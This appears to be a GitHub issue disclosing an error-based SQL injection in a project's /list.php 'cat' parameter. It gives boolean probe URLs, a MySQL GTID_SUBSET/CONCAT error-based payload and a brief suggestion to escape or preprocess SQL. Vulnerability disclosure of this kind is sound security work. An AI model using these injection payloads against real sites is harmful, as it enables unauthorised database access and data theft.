There is a vulnerability in your project - SQL injection

Code Adress：/list.php
Type：SQL injection error-based
Parameter：cat
Code：
![6ENHHBUPFTUAX 5XIFUW0UY](https://user-images.githubusercontent.com/84234453/123659024-d661e080-d864-11eb-98dc-b6fd4e743f6e.png)

exploit：
http://debug1.com//list.php?cat=1 and 1=1
http://debug1.com//list.php?cat=1 and 1=2
![OSSV4KAU1W5`384M`EDDJWP](https://user-images.githubusercontent.com/84234453/123659089-e7aaed00-d864-11eb-8056-b02906eea1ff.png)

https://127.0.0.1/list.php?cat=1 AND GTID_SUBSET(CONCAT(0x7176707071,(SELECT (ELT(2051=2051,1))),0x716b7a7171),2051)


Repair suggestion: intercept the SQL injection request that adds the get post parameter to the program, or escape or preprocess the program SQL


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

There is a vulnerability in your project - SQL injection #3

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

There is a vulnerability in your project - SQL injection #3

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions